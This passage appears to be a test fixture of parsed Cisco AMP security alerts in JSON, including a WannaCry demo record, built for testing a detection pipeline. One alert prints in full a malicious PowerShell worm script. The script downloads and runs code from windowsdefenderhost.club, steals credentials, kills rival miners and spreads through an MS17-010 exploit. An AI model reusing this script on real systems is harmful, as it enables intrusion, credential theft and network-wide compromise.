All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"67858ead93feed62c0b1865369840e6e8086f53b\",\"sha256\":\"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334\",\"size\":425984,\"type_id\":1}]},\"remediated\":false,\"severity\":\"medium\",\"silent\":false,\"start_ts\":1610640884,\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"],\"type\":\"activity\",\"normalized\":{\"observables\":{\"file\":{\"name\":[\"powershell.exe\",\"wmiprvse.exe\"],\"path\":[\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\",\"c:\\\\windows\\\\system32\\\\wbem\"]}},\"name\":\"wmiprvse launched encoded powershell command\"},\"ts\":1610640884},\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"]}}", + "id": "6880683125978957000", + "kind": "alert" + }, + "cisco": { + "amp": { + "bp_data": { + "severity": "medium", + "start_ts": 1610640884, + "remediated": false, + "detection": "apde:20190517123456", + "silent": false, + "normalized": { + "name": "wmiprvse launched encoded powershell command", + "observables": { + "file": { + "name": [ + "powershell.exe", + "wmiprvse.exe" + ], + "path": [ + "c:\\windows\\system32\\windowspowershell\\v1.0", + "c:\\windows\\system32\\wbem" + ] + } + } + }, + "type": "activity", + "observables": { + "file": [ + { + "sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e", + "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218", + "size": 443392, + "type_id": 1, + "name": "powershell.exe", + "properties": { + "file_version": "10.0.14409.1005", + "copyright": "© Microsoft Corporation. 
All rights reserved.", + "product": "Microsoft® Windows® Operating System", + "product_version": "10.0.14409.1005" + }, + "md5": "a575a7610e5f003cc36df39e07c4ba7d" + }, + { + "sha1": "67858ead93feed62c0b1865369840e6e8086f53b", + "path": "C:\\Windows\\System32\\wbem", + "sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334", + "size": 425984, + "type_id": 1, + "name": "WmiPrvSE.exe", + "properties": { + "file_version": "10.0.14409.1005", + "copyright": "© Microsoft Corporation. All rights reserved.", + "product": "Microsoft® Windows® Operating System", + "product_version": "10.0.14409.1005" + }, + "md5": "d683c112190f4b4c6d477d693ee88e35" + } + ] + }, + "end_ts": 1610640884, + "engine": "apde", + "audit": false, + "name": "WMIPRVSE Launched Encoded Powershell Command", + "tactics": [ + "TA0002", + "TA0005", + "TA0008" + ], + "details": { + "eng_ver": "0.9.0.104", + "schema": "endpoint", + "sig_rev": 5, + "matched_activity": { + "limited": false, + "matched": 1, + "events": [ + { + "process:start": { + "app": "powershell.exe", + "parent_app": "WmiPrvSE.exe", + "parent_user": "SYSTEM", + "parent_user_sid": "010100000000000512000000", + "pid": 10724, + "args": [ + "powershell.exe", + "-NoP", + "-NonI", + "-W", + "Hidden", + "-E", + "$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) " + ], + "cmd_line": "powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) ", + "parent_puid": 132461352663910600, + "puid": 132465072105597400, + "user_sid": "010100000000000512000000", + "parent_pid": 2236, + "app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "parent_app_path": "C:\\Windows\\System32\\wbem", + "user": "user@testdomain.com", + "ts": 1602033881727175700 + } + } + ] + }, + "eng_epoch": 1, + "schema_epoch": 2, + "sig_id": 20190517123456, + "actions": [ + { + "start_ts": 1602033881805, + "action": "end_process", + "params": [ + "10724" + ], + "end_ts": 1602033881808, + "status": "success" + } + ] + }, + "id": "d2616Ab846", + "ts": 1610640884 + }, + "detection": "WMIPRVSE Launched Encoded Powershell Command", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "be:b0:d5:89:e2:96", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "be:b0:d5:89:e2:96" + ] + }, + "mitre_tactics": [ + "TA0002", + "TA0005", + "TA0008" + ], + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648222 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500191289Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6419247189909832000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 
